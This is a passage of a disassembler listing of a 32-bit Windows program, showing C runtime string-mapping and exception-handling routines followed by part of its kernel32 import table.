push dword ptr [edi+4]
call sub_4180D0
inc eax
push eax
call sub_418BE5
pop ecx
mov [esi+4], eax
test eax, eax
pop ecx
jz short loc_4232BB
push dword ptr [edi+4]
push eax
call sub_417FE0
pop ecx
pop ecx
jmp short loc_4232BB
; ---------------------------------------------------------------------------
loc_4232B5: ; CODE XREF: sub_423278+16�j
mov eax, [edi+4]
mov [esi+4], eax
loc_4232BB: ; CODE XREF: sub_423278+2E�j
; sub_423278+3B�j
mov eax, esi
pop edi
pop esi
retn 4
sub_423278 endp
; =============== S U B R O U T I N E =======================================
sub_4232C2 proc near ; CODE XREF: sub_422E88+2B�p
; sub_422F3E+2B�p ...
cmp dword ptr [ecx+8], 0
mov dword ptr [ecx], 424CE8h
jz short locret_4232D7
push dword ptr [ecx+4] ; lpMem
call sub_41889B
pop ecx
locret_4232D7: ; CODE XREF: sub_4232C2+A�j
retn
sub_4232C2 endp
; ---------------------------------------------------------------------------
mov eax, [ecx+4]
test eax, eax
jnz short locret_4232E4
mov eax, offset aUnknownExcepti ; "Unknown exception"
locret_4232E4: ; CODE XREF: .text:004232DD�j
retn
; =============== S U B R O U T I N E =======================================
sub_4232E5 proc near ; CODE XREF: .text:004232FD�p
mov dword ptr [ecx], offset off_424D08
mov ecx, [ecx+4]
test ecx, ecx
jz short locret_4232F9
push ecx ; lpMem
call sub_418227
pop ecx
locret_4232F9: ; CODE XREF: sub_4232E5+B�j
retn
sub_4232E5 endp
; ---------------------------------------------------------------------------
push esi
mov esi, ecx
call sub_4232E5
test byte ptr [esp+8], 1
jz short loc_423310
push esi
call sub_41889B
pop ecx
loc_423310: ; CODE XREF: .text:00423307�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423316 proc near ; CODE XREF: sub_422DA0+54�p
; .text:00422E83�p ...
dwExceptionCode = dword ptr -20h
dwExceptionFlags= dword ptr -1Ch
nNumberOfArguments= dword ptr -10h
Arguments = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push edi
push 8
pop ecx
mov esi, 424D10h
lea edi, [ebp+dwExceptionCode]
rep movsd
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
lea eax, [ebp+Arguments]
push eax ; lpArguments
push [ebp+nNumberOfArguments] ; nNumberOfArguments
push [ebp+dwExceptionFlags] ; dwExceptionFlags
push [ebp+dwExceptionCode] ; dwExceptionCode
call RaiseException ; RaiseException
pop edi
pop esi
leave
retn 8
sub_423316 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_423350(const WCHAR WideCharStr)
sub_423350 proc near ; CODE XREF: sub_423116+56�p
; sub_423116+63�p
DestStr = word ptr -2
WideCharStr = word ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, dword ptr [ebp+WideCharStr]
cmp ax, 0FFFFh
jnz short loc_423362
or ax, ax
leave
retn
; ---------------------------------------------------------------------------
loc_423362: ; CODE XREF: sub_423350+B�j
cmp dword ptr byte_445EDC+0D4474h, 0
jnz short loc_42337C
cmp ax, 41h
jb short locret_4233C3
cmp ax, 5Ah
ja short locret_4233C3
add eax, 20h
leave
retn
; ---------------------------------------------------------------------------
loc_42337C: ; CODE XREF: sub_423350+19�j
cmp ax, 100h
jnb short loc_423396
push 1 ; __int16
push eax ; WideCharStr
call sub_4235FE
pop ecx
test eax, eax
pop ecx
jnz short loc_423396
mov ax, [ebp+WideCharStr]
leave
retn
; ---------------------------------------------------------------------------
loc_423396: ; CODE XREF: sub_423350+30�j
; sub_423350+3E�j
push 0 ; CodePage
lea eax, [ebp+DestStr]
push 1 ; cchDest
push eax ; lpDestStr
lea eax, [ebp+WideCharStr]
push 1 ; cchWideChar
push eax ; lpWideCharStr
push 100h ; dwMapFlags
push dword ptr byte_445EDC+0D4474h ; Locale
call sub_4233C5
add esp, 1Ch
test eax, eax
mov ax, [ebp+WideCharStr]
jz short locret_4233C3
mov ax, [ebp+DestStr]
locret_4233C3: ; CODE XREF: sub_423350+1F�j
; sub_423350+25�j ...
leave
retn
sub_423350 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4233C5(LCID Locale, DWORD dwMapFlags, LPCWSTR lpWideCharStr, int cchWideChar, LPWSTR lpDestStr, int cchDest, UINT CodePage)
sub_4233C5 proc near ; CODE XREF: sub_423350+5F�p
var_2C = dword ptr -2Ch
var_24 = dword ptr -24h
cchSrc = dword ptr -20h
lpSrcStr = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
Locale = dword ptr 8
dwMapFlags = dword ptr 0Ch
lpWideCharStr = dword ptr 10h
cchWideChar = dword ptr 14h
lpDestStr = dword ptr 18h
cchDest = dword ptr 1Ch
CodePage = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push 424D30h
push offset sub_41FD98
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor esi, esi
cmp dword ptr byte_445EDC+0D46D0h, esi
jnz short loc_42343B
push esi ; cchDest
push esi ; lpDestStr
push 1
pop ebx
push ebx ; cchSrc
push offset SrcStr ; lpSrcStr
mov edi, 100h
push edi ; dwMapFlags
push esi ; Locale
call LCMapStringW ; LCMapStringW
test eax, eax
jz short loc_423419
mov dword ptr byte_445EDC+0D46D0h, ebx
jmp short loc_42343B
; ---------------------------------------------------------------------------
loc_423419: ; CODE XREF: sub_4233C5+4A�j
push esi ; cchDest
push esi ; lpDestStr
push ebx ; cchSrc
push offset byte_440FAC ; lpSrcStr
push edi ; dwMapFlags
push esi ; Locale
call LCMapStringA ; LCMapStringA
test eax, eax
jz loc_4235BA
mov dword ptr byte_445EDC+0D46D0h, 2
loc_42343B: ; CODE XREF: sub_4233C5+2E�j
; sub_4233C5+52�j
cmp [ebp+cchWideChar], esi
jle short loc_423450
push [ebp+cchWideChar]
push [ebp+lpWideCharStr]
call sub_4235CE
pop ecx
pop ecx
mov [ebp+cchWideChar], eax
loc_423450: ; CODE XREF: sub_4233C5+79�j
mov eax, dword ptr byte_445EDC+0D46D0h
cmp eax, 1
jnz short loc_423477
push [ebp+cchDest] ; cchDest
push [ebp+lpDestStr] ; lpDestStr
push [ebp+cchWideChar] ; cchSrc
push [ebp+lpWideCharStr] ; lpSrcStr
push [ebp+dwMapFlags] ; dwMapFlags
push [ebp+Locale] ; Locale
call LCMapStringW ; LCMapStringW
jmp loc_4235BC
; ---------------------------------------------------------------------------
loc_423477: ; CODE XREF: sub_4233C5+93�j
cmp eax, 2
jnz loc_4235BA
cmp [ebp+CodePage], esi
jnz short loc_42348D
mov eax, dword ptr byte_445EDC+0D4484h
mov [ebp+CodePage], eax
loc_42348D: ; CODE XREF: sub_4233C5+BE�j
push esi ; lpUsedDefaultChar
push esi ; lpDefaultChar
push esi ; cbMultiByte
push esi ; lpMultiByteStr
push [ebp+cchWideChar] ; cchWideChar
push [ebp+lpWideCharStr] ; lpWideCharStr
push 220h ; dwFlags
push [ebp+CodePage] ; CodePage
call WideCharToMultiByte ; WideCharToMultiByte
mov [ebp+cchSrc], eax
cmp eax, esi
jz loc_4235BA
mov [ebp+var_4], esi
add eax, 3
and al, 0FCh
call sub_417F30
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+lpSrcStr], eax
jmp short loc_4234D3
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor esi, esi
mov [ebp+lpSrcStr], esi
loc_4234D3: ; CODE XREF: sub_4233C5+100�j
or [ebp+var_4], 0FFFFFFFFh
cmp [ebp+lpSrcStr], esi
jz loc_4235BA
push esi ; lpUsedDefaultChar
push esi ; lpDefaultChar
push [ebp+cchSrc] ; cbMultiByte
push [ebp+lpSrcStr] ; lpMultiByteStr
push [ebp+cchWideChar] ; cchWideChar
push [ebp+lpWideCharStr] ; lpWideCharStr
push 220h ; dwFlags
push [ebp+CodePage] ; CodePage
call WideCharToMultiByte ; WideCharToMultiByte
test eax, eax
jz loc_4235BA
push esi ; cchDest
push esi ; lpDestStr
push [ebp+cchSrc] ; cchSrc
push [ebp+lpSrcStr] ; lpSrcStr
push [ebp+dwMapFlags] ; dwMapFlags
push [ebp+Locale] ; Locale
call LCMapStringA ; LCMapStringA
mov edi, eax
mov [ebp+var_2C], edi
cmp edi, esi
jz loc_4235BA
mov [ebp+var_4], 1
add eax, 3
and al, 0FCh
call sub_417F30
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_24], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_423556
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor esi, esi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov edi, [ebp+var_2C]
loc_423556: ; CODE XREF: sub_4233C5+17D�j
cmp ebx, esi
jz short loc_4235BA
push edi ; cchDest
push ebx ; lpDestStr
push [ebp+cchSrc] ; cchSrc
push [ebp+lpSrcStr] ; lpSrcStr
push [ebp+dwMapFlags] ; dwMapFlags
push [ebp+Locale] ; Locale
call LCMapStringA ; LCMapStringA
test eax, eax
jz short loc_4235BA
test byte ptr [ebp+dwMapFlags+1], 4
jz short loc_423594
mov eax, [ebp+cchDest]
cmp eax, esi
jz short loc_4235B6
cmp eax, edi
jl short loc_423585
mov eax, edi
loc_423585: ; CODE XREF: sub_4233C5+1BC�j
push eax
push ebx
push [ebp+lpDestStr]
call sub_419300
add esp, 0Ch
jmp short loc_4235B6
; ---------------------------------------------------------------------------
loc_423594: ; CODE XREF: sub_4233C5+1B1�j
cmp [ebp+cchDest], esi
jnz short loc_42359D
push esi
push esi
jmp short loc_4235A3
; ---------------------------------------------------------------------------
loc_42359D: ; CODE XREF: sub_4233C5+1D2�j
push [ebp+cchDest] ; cchWideChar
push [ebp+lpDestStr] ; lpWideCharStr
loc_4235A3: ; CODE XREF: sub_4233C5+1D6�j
push edi ; cbMultiByte
push ebx ; lpMultiByteStr
push 1 ; dwFlags
push [ebp+CodePage] ; CodePage
call MultiByteToWideChar ; MultiByteToWideChar
mov edi, eax
cmp edi, esi
jz short loc_4235BA
loc_4235B6: ; CODE XREF: sub_4233C5+1B8�j
; sub_4233C5+1CD�j
mov eax, edi
jmp short loc_4235BC
; ---------------------------------------------------------------------------
loc_4235BA: ; CODE XREF: sub_4233C5+66�j
; sub_4233C5+B5�j ...
xor eax, eax
loc_4235BC: ; CODE XREF: sub_4233C5+AD�j
; sub_4233C5+1F3�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4233C5 endp
; =============== S U B R O U T I N E =======================================
sub_4235CE proc near ; CODE XREF: sub_4233C5+81�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_4235ED
loc_4235DE: ; CODE XREF: sub_4235CE+1D�j
cmp word ptr [eax], 0
jz short loc_4235ED
inc eax
mov esi, ecx
inc eax
dec ecx
test esi, esi
jnz short loc_4235DE
loc_4235ED: ; CODE XREF: sub_4235CE+E�j
; sub_4235CE+14�j
cmp word ptr [eax], 0
pop esi
jnz short loc_4235FB
sub eax, [esp+arg_0]
sar eax, 1
retn
; ---------------------------------------------------------------------------
loc_4235FB: ; CODE XREF: sub_4235CE+24�j
mov eax, edx
retn
sub_4235CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4235FE(const WCHAR WideCharStr, __int16)
sub_4235FE proc near ; CODE XREF: sub_423350+35�p
CharType = word ptr -4
WideCharStr = word ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+WideCharStr], 0FFFFh
jz short loc_42363E
cmp [ebp+WideCharStr], 100h
jnb short loc_423622
movzx eax, [ebp+WideCharStr]
mov ecx, dword ptr unk_43DD34
mov ax, [ecx+eax*2]
jmp short loc_423645
; ---------------------------------------------------------------------------
loc_423622: ; CODE XREF: sub_4235FE+12�j
push 0 ; Locale
lea eax, [ebp+CharType]
push 0 ; CodePage
push eax ; lpCharType
lea eax, [ebp+WideCharStr]
push 1 ; cchWideChar
push eax ; lpWideCharStr
push 1 ; dwInfoType
call sub_423650
add esp, 18h
test eax, eax
jnz short loc_423642
loc_42363E: ; CODE XREF: sub_4235FE+A�j
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_423642: ; CODE XREF: sub_4235FE+3E�j
mov eax, dword ptr [ebp+CharType]
loc_423645: ; CODE XREF: sub_4235FE+22�j
movzx ecx, [ebp+arg_4]
movzx eax, ax
and eax, ecx
leave
retn
sub_4235FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_423650(DWORD dwInfoType, LPCWSTR lpWideCharStr, int cchWideChar, LPWORD lpCharType, UINT CodePage, LCID Locale)
sub_423650 proc near ; CODE XREF: sub_4235FE+34�p
lpSrcStr = dword ptr -2Ch
cchSrc = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
CharType = word ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
dwInfoType = dword ptr 8
lpWideCharStr = dword ptr 0Ch
cchWideChar = dword ptr 10h
lpCharType = dword ptr 14h
CodePage = dword ptr 18h
Locale = dword ptr 1Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push 424D48h
push offset sub_41FD98
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, dword ptr byte_445EDC+0D46D4h
xor edi, edi
cmp eax, edi
jnz short loc_4236BF
lea eax, [ebp+CharType]
push eax ; lpCharType
push 1
pop esi
push esi ; cchSrc
push offset SrcStr ; lpSrcStr
push esi ; dwInfoType
call GetStringTypeW ; GetStringTypeW
test eax, eax
jz short loc_42369D
mov eax, esi
jmp short loc_4236BA
; ---------------------------------------------------------------------------
loc_42369D: ; CODE XREF: sub_423650+47�j
lea eax, [ebp+CharType]
push eax ; lpCharType
push esi ; cchSrc
push offset byte_440FAC ; lpSrcStr
push esi ; dwInfoType
push edi ; Locale
call GetStringTypeA ; GetStringTypeA
test eax, eax
jz loc_423801
push 2
pop eax
loc_4236BA: ; CODE XREF: sub_423650+4B�j
mov dword ptr byte_445EDC+0D46D4h, eax
loc_4236BF: ; CODE XREF: sub_423650+2F�j
cmp eax, 1
jnz short loc_4236DB
push [ebp+lpCharType] ; lpCharType
push [ebp+cchWideChar] ; cchSrc
push [ebp+lpWideCharStr] ; lpSrcStr
push [ebp+dwInfoType] ; dwInfoType
call GetStringTypeW ; GetStringTypeW
jmp loc_423803
; ---------------------------------------------------------------------------
loc_4236DB: ; CODE XREF: sub_423650+72�j
cmp eax, 2
jnz loc_423801
cmp [ebp+CodePage], edi
jnz short loc_4236F1
mov eax, dword ptr byte_445EDC+0D4484h
mov [ebp+CodePage], eax
loc_4236F1: ; CODE XREF: sub_423650+97�j
push edi ; lpUsedDefaultChar
push edi ; lpDefaultChar
push edi ; cbMultiByte
push edi ; lpMultiByteStr
push [ebp+cchWideChar] ; cchWideChar
push [ebp+lpWideCharStr] ; lpWideCharStr
push 220h ; dwFlags
push [ebp+CodePage] ; CodePage
call WideCharToMultiByte ; WideCharToMultiByte
mov esi, eax
mov [ebp+cchSrc], esi
cmp esi, edi
jz loc_423801
mov [ebp+var_4], edi
add eax, 3
and al, 0FCh
call sub_417F30
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+lpSrcStr], eax
push esi
push edi
push eax
call sub_4179E0
add esp, 0Ch
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_42374F
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+lpSrcStr], edi
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+cchSrc]
loc_42374F: ; CODE XREF: sub_423650+EA�j
cmp [ebp+lpSrcStr], edi
jz loc_423801
push edi ; lpUsedDefaultChar
push edi ; lpDefaultChar
push esi ; cbMultiByte
push [ebp+lpSrcStr] ; lpMultiByteStr
push [ebp+cchWideChar] ; cchWideChar
push [ebp+lpWideCharStr] ; lpWideCharStr
push 220h ; dwFlags
push [ebp+CodePage] ; CodePage
call WideCharToMultiByte ; WideCharToMultiByte
test eax, eax
jz loc_423801
mov [ebp+var_4], 1
lea eax, [esi+esi+2]
add eax, 3
and al, 0FCh
call sub_417F30
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_24], ebx
jmp short loc_4237A4
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
loc_4237A4: ; CODE XREF: sub_423650+147�j
or [ebp+var_4], 0FFFFFFFFh
cmp ebx, edi
jz short loc_423801
mov eax, [ebp+Locale]
cmp eax, edi
jnz short loc_4237B8
mov eax, dword ptr byte_445EDC+0D4474h
loc_4237B8: ; CODE XREF: sub_423650+161�j
mov ecx, [ebp+cchWideChar]
lea edi, [ecx+ecx]
lea esi, [edi+ebx]
or word ptr [esi], 0FFFFh
or word ptr [esi-2], 0FFFFh
push ebx ; lpCharType
push [ebp+cchSrc] ; cchSrc
push [ebp+lpSrcStr] ; lpSrcStr
push [ebp+dwInfoType] ; dwInfoType
push eax ; Locale
call GetStringTypeA ; GetStringTypeA
mov [ebp+var_20], eax
cmp word ptr [esi-2], 0FFFFh
jz short loc_423801
cmp word ptr [esi], 0FFFFh
jnz short loc_423801
push edi
push ebx
push [ebp+lpCharType]
call sub_4188B0
add esp, 0Ch
mov eax, [ebp+var_20]
jmp short loc_423803
; ---------------------------------------------------------------------------
loc_423801: ; CODE XREF: sub_423650+61�j
; sub_423650+8E�j ...
xor eax, eax
loc_423803: ; CODE XREF: sub_423650+86�j
; sub_423650+1AF�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_423650 endp
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp-38h]
jmp loc_404FC3
; ---------------------------------------------------------------------------
mov eax, [ebp-20h]
and eax, 1
test eax, eax
jz locret_423836
mov ecx, [ebp+8]
jmp loc_404FC3
; ---------------------------------------------------------------------------
locret_423836: ; CODE XREF: .text:00423828�j
retn
; ---------------------------------------------------------------------------
loc_423837: ; DATA XREF: sub_404BA0�o
mov eax, offset unk_424EF0
jmp loc_418537
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp+14h]
jmp loc_404FC3
; ---------------------------------------------------------------------------
lea ecx, [ebp-1Ch]
jmp loc_404FC3
; ---------------------------------------------------------------------------
loc_423854: ; DATA XREF: sub_404D3F�o
mov eax, offset unk_424F1C
jmp loc_418537
; ---------------------------------------------------------------------------
align 10h
loc_423860: ; DATA XREF: sub_4052A4�o
mov eax, offset unk_424F6C
jmp loc_418537
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp-20h]
jmp loc_404FC3
; ---------------------------------------------------------------------------
loc_423874: ; DATA XREF: sub_422DA0�o
mov eax, offset unk_425008
jmp loc_418537
; ---------------------------------------------------------------------------
align 10h
mov ecx, [ebp-14h]
jmp sub_4232C2
; ---------------------------------------------------------------------------
loc_423888: ; DATA XREF: sub_422DFA�o
mov eax, offset unk_425030
jmp loc_418537
; ---------------------------------------------------------------------------
align 4
mov ecx, [ebp-10h]
jmp sub_4232C2
; ---------------------------------------------------------------------------
loc_42389C: ; DATA XREF: sub_422E88�o
mov eax, offset unk_425078
jmp loc_418537
; ---------------------------------------------------------------------------
align 4
mov ecx, [ebp-10h]
jmp sub_4232C2
; ---------------------------------------------------------------------------
loc_4238B0: ; DATA XREF: sub_422EE1�o
mov eax, offset unk_4250A0
jmp loc_418537
; ---------------------------------------------------------------------------
align 4
mov ecx, [ebp-10h]
jmp sub_4232C2
; ---------------------------------------------------------------------------
loc_4238C4: ; DATA XREF: sub_422F3E�o
mov eax, offset unk_4250C8
jmp loc_418537
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-20h]
jmp loc_404FC3
; ---------------------------------------------------------------------------
loc_4238D8: ; DATA XREF: sub_422FCC�o
mov eax, offset unk_425130
jmp loc_418537
; ---------------------------------------------------------------------------
align 4
mov ecx, [ebp-10h]
jmp sub_4232C2
; ---------------------------------------------------------------------------
loc_4238EC: ; DATA XREF: sub_423026�o
mov eax, offset unk_425158
jmp loc_418537
; ---------------------------------------------------------------------------
align 800h
_text ends
;
; Imports from kernel32.dll
;
; ===========================================================================
; Segment type: Externs
; _idata
; BOOL __stdcall GetFileTime(HANDLE hFile, LPFILETIME lpCreationTime, LPFILETIME lpLastAccessTime, LPFILETIME lpLastWriteTime)
extrn GetFileTime:dword ; CODE XREF: sub_40B4BE+60�p
; sub_40BAB1+EA�p
; DATA XREF: ...
; BOOL __stdcall SetEnvironmentVariableA(LPCSTR lpName, LPCSTR lpValue)
extrn SetEnvironmentVariableA:dword ; CODE XREF: sub_422AB4+173�p
; DATA XREF: sub_422AB4+173�r
; int __stdcall CompareStringW(LCID Locale, DWORD dwCmpFlags, LPCWSTR lpString1, int cchCount1, LPCWSTR lpString2, int cchCount2)
extrn CompareStringW:dword ; CODE XREF: sub_42280C+3E�p
; sub_42280C+261�p
; DATA XREF: ...
; int __stdcall CompareStringA(LCID Locale, DWORD dwCmpFlags, LPCSTR lpString1, int cchCount1, LPCSTR lpString2, int cchCount2)
extrn CompareStringA:dword ; CODE XREF: sub_42280C+5B�p
; sub_42280C+B9�p
; DATA XREF: ...
; BOOL __stdcall SetEndOfFile(HANDLE hFile)
extrn SetEndOfFile:dword ; CODE XREF: sub_42228A+F9�p
; DATA XREF: sub_42228A+F9�r
; BOOL __stdcall FlushFileBuffers(HANDLE hFile)
extrn FlushFileBuffers:dword ; CODE XREF: sub_420DD0+2C�p
; DATA XREF: sub_420DD0+2C�r
; BOOL __stdcall SetStdHandle(DWORD nStdHandle, HANDLE hHandle)
extrn SetStdHandle:dword ; CODE XREF: sub_420CA2:loc_420CF2�p
; sub_420D19:loc_420D6C�p
; DATA XREF: ...
; BOOL __stdcall IsBadCodePtr(FARPROC lpfn)
extrn IsBadCodePtr:dword ; CODE XREF: sub_420A5B+8�p
; DATA XREF: sub_420A5B+8�r
; BOOL __stdcall IsBadReadPtr(const void *lp, UINT_PTR ucb)
extrn IsBadReadPtr:dword ; CODE XREF: sub_420A23+C�p
; DATA XREF: sub_420A23+C�r
extrn byte_424024:byte:4 ; CODE XREF: .text:00420A0A�p
; .text:00420A1C�p
; DATA XREF: ...
;
; Imports from kernel32.dll
;
; BOOL __stdcall GetStringTypeW(DWORD dwInfoType, LPCWSTR lpSrcStr, int cchSrc, LPWORD lpCharType)
extrn GetStringTypeW:dword ; CODE XREF: sub_420187+3F�p
; sub_420187+12D�p ...
; BOOL __stdcall GetStringTypeA(LCID Locale, DWORD dwInfoType, LPCSTR lpSrcStr, int cchSrc, LPWORD lpCharType)
extrn GetStringTypeA:dword ; CODE XREF: sub_420187+59�p
; sub_420187+8D�p ...
; LPWCH __stdcall GetEnvironmentStringsW()
extrn GetEnvironmentStringsW:dword ; CODE XREF: sub_41FC5D+1B�p
; sub_41FC5D+5B�p
; DATA XREF: ...
; LPCH __stdcall GetEnvironmentStrings()
extrn GetEnvironmentStrings:dword ; CODE XREF: sub_41FC5D:loc_41FC8C�p
; sub_41FC5D+E1�p
; DATA XREF: ...
; BOOL __stdcall FreeEnvironmentStringsW(LPWCH)
extrn FreeEnvironmentStringsW:dword ; CODE XREF: sub_41FC5D+CE�p
; DATA XREF: sub_41FC5D+CE�r
; BOOL __stdcall FreeEnvironmentStringsA(LPCH)
extrn FreeEnvironmentStringsA:dword ; CODE XREF: sub_41FC5D+11F�p
; DATA XREF: sub_41FC5D+11F�r
; LONG __stdcall UnhandledExceptionFilter(struct _EXCEPTION_POINTERS *ExceptionInfo)
extrn UnhandledExceptionFilter:dword ; CODE XREF: sub_41F77B+138�p
; DATA XREF: sub_41F77B+138�r
; UINT __stdcall GetOEMCP()
extrn GetOEMCP:dword ; DATA XREF: sub_41F379+1A�r
; UINT __stdcall GetACP()
extrn GetACP:dword ; DATA XREF: sub_41F379+2F�r
; BOOL __stdcall GetCPInfo(UINT CodePage, LPCPINFO lpCPInfo)
extrn GetCPInfo:dword ; CODE XREF: sub_41F1E0+48�p
; sub_41F41F+14�p ...
; int __stdcall LCMapStringW(LCID Locale, DWORD dwMapFlags, LPCWSTR lpSrcStr, int cchSrc, LPWSTR lpDestStr, int cchDest)
extrn LCMapStringW:dword ; CODE XREF: sub_41EE0F+42�p
; sub_41EE0F+14D�p ...
; int __stdcall LCMapStringA(LCID Locale, DWORD dwMapFlags, LPCSTR lpSrcStr, int cchSrc, LPSTR lpDestStr, int cchDest)
extrn LCMapStringA:dword ; CODE XREF: sub_41EE0F+5E�p
; sub_41EE0F+A7�p ...
; DWORD __stdcall GetFileType(HANDLE hFile)
extrn GetFileType:dword ; CODE XREF: sub_41E920+FF�p
; sub_41E920+166�p ...
; void __stdcall ExitThread(DWORD dwExitCode)
extrn ExitThread:dword ; CODE XREF: sub_401000+AA�p
; sub_401444+95�p ...
; DWORD __stdcall GetTickCount()
extrn GetTickCount:dword ; CODE XREF: sub_401000+27�p
; sub_401444+1B2�p ...
; BOOL __stdcall QueryPerformanceCounter(LARGE_INTEGER *lpPerformanceCount)
extrn QueryPerformanceCounter:dword ; CODE XREF: sub_4010B2+18C�p
; sub_4010B2+2D4�p ...
; BOOL __stdcall QueryPerformanceFrequency(LARGE_INTEGER *lpFrequency)
extrn QueryPerformanceFrequency:dword ; CODE XREF: sub_4010B2+182�p
; sub_401E07+FF�p
; DATA XREF: ...
; void __stdcall Sleep(DWORD dwMilliseconds)
extrn Sleep:dword ; CODE XREF: sub_4019BB+18B�p
; sub_401C6E+95�p ...
; int __stdcall MultiByteToWideChar(UINT CodePage, DWORD dwFlags, LPCSTR lpMultiByteStr, int cbMultiByte, LPWSTR lpWideCharStr, int cchWideChar)
extrn MultiByteToWideChar:dword ; CODE XREF: sub_4035F5+66�p
; sub_4036D8+65�p ...
extrn byte_424074:byte:8 ; CODE XREF: .text:00403B13�p
; sub_40730A+80�p ...
;
; Imports from kernel32.dll
;
; BOOL __stdcall WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped)
extrn WriteFile:dword ; CODE XREF: .text:00403ADE�p
; sub_408F04+1B0�p ...
; BOOL __stdcall TransactNamedPipe(HANDLE hNamedPipe, LPVOID lpInBuffer, DWORD nInBufferSize, LPVOID lpOutBuffer, DWORD nOutBufferSize, LPDWORD lpBytesRead, LPOVERLAPPED lpOverlapped)
extrn TransactNamedPipe:dword ; CODE XREF: .text:00403AC4�p
; DATA XREF: .text:00403AC4�r
extrn byte_424084:byte:8 ; CODE XREF: .text:00403A46�p
; sub_4069DA+1C3�p ...
;
; Imports from kernel32.dll
;
; int __stdcall GetTimeFormatA(LCID Locale, DWORD dwFlags, const SYSTEMTIME *lpTime, LPCSTR lpFormat, LPSTR lpTimeStr, int cchTime)
extrn GetTimeFormatA:dword ; CODE XREF: StartAddress+9F�p
; sub_40C3BE+1B6�p
; DATA XREF: ...
; int __stdcall GetDateFormatA(LCID Locale, DWORD dwFlags, const SYSTEMTIME *lpDate, LPCSTR lpFormat, LPSTR lpDateStr, int cchDate)
extrn GetDateFormatA:dword ; CODE XREF: StartAddress+8B�p
; sub_40C3BE+19F�p
; DATA XREF: ...
; DWORD __stdcall GetLastError()
extrn GetLastError:dword ; CODE XREF: sub_4069DA+26F�p
; sub_407B48+12F�p ...
; HANDLE __stdcall CreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId)
extrn CreateThread:dword ; CODE XREF: sub_4069DA+24C�p
; sub_407B48+10F�p ...
extrn byte_42409C:byte:0Ch ; CODE XREF: sub_4069DA+1ED�p
; sub_40730A+38�p ...
;
; Imports from kernel32.dll
;
; BOOL __stdcall FileTimeToSystemTime(const FILETIME *lpFileTime, LPSYSTEMTIME lpSystemTime)
extrn FileTimeToSystemTime:dword ; CODE XREF: sub_406C89+27A�p
; sub_409CEB+135�p
; DATA XREF: ...
; BOOL __stdcall FileTimeToLocalFileTime(const FILETIME *lpFileTime, LPFILETIME lpLocalFileTime)
extrn FileTimeToLocalFileTime:dword ; CODE XREF: sub_406C89+26C�p
; sub_409CEB+123�p
; DATA XREF: ...
extrn byte_4240B0:byte:0Ch ; CODE XREF: sub_406C89+20C�p
; sub_406C89+5DC�p ...
;
; Imports from kernel32.dll
;
; void __stdcall LeaveCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
extrn LeaveCriticalSection:dword ; CODE XREF: sub_4080C3+130�p
; DATA XREF: sub_4080C3+130�r
; void __stdcall EnterCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
extrn EnterCriticalSection:dword ; CODE XREF: sub_4080C3+C5�p
; DATA XREF: sub_4080C3+C5�r
